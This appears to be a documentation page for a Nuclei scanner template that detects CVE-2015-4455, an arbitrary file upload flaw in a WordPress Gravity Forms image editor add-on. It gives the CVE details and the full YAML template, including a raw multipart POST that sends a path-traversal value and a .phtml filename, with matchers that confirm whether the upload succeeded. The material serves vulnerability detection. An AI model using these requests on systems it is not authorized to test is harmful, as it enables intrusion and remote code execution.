WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
ID: CVE-2015-4455
Severity: critical
Author: MaStErChO
Tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project
Description
Section titled “Description”Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
YAML Source
Section titled “YAML Source”id: CVE-2015-4455
info: name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload author: MaStErChO severity: critical description: | Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary. reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-4455 cwe-id: CWE-434 epss-score: 0.55856 epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: "aviary_image_editor_add-on_for_gravity_forms_project" product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_projectvariables: filename: '{{rand_base(7, "abc")}}'
http: - raw: - | GET /?gf_page=upload HTTP/1.1 Host: {{Hostname}}
- | POST /?gf_page=upload HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
--a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="field_id"
3 --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="form_id"
1 --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="gform_unique_id"
../../../ --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="name"
{{filename}}.phtml --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg" Content-Type: text/html
{{randstr}} --a54906fe12c504cb01ca836d062f82fa--
host-redirects: true matchers: - type: dsl dsl: - 'contains(body_1, "Failed to upload file")' - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and# digest: 4a0a00473045022100f104842e83cdd333bfec4c8c6463e95237500ed675f1d683d2f62d23ab8f4c3702200cc2a4cb6f6e6ee78a9c3e6f2a779909755663c65094e943ccce92fd1f4fbe06:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-4455.yaml"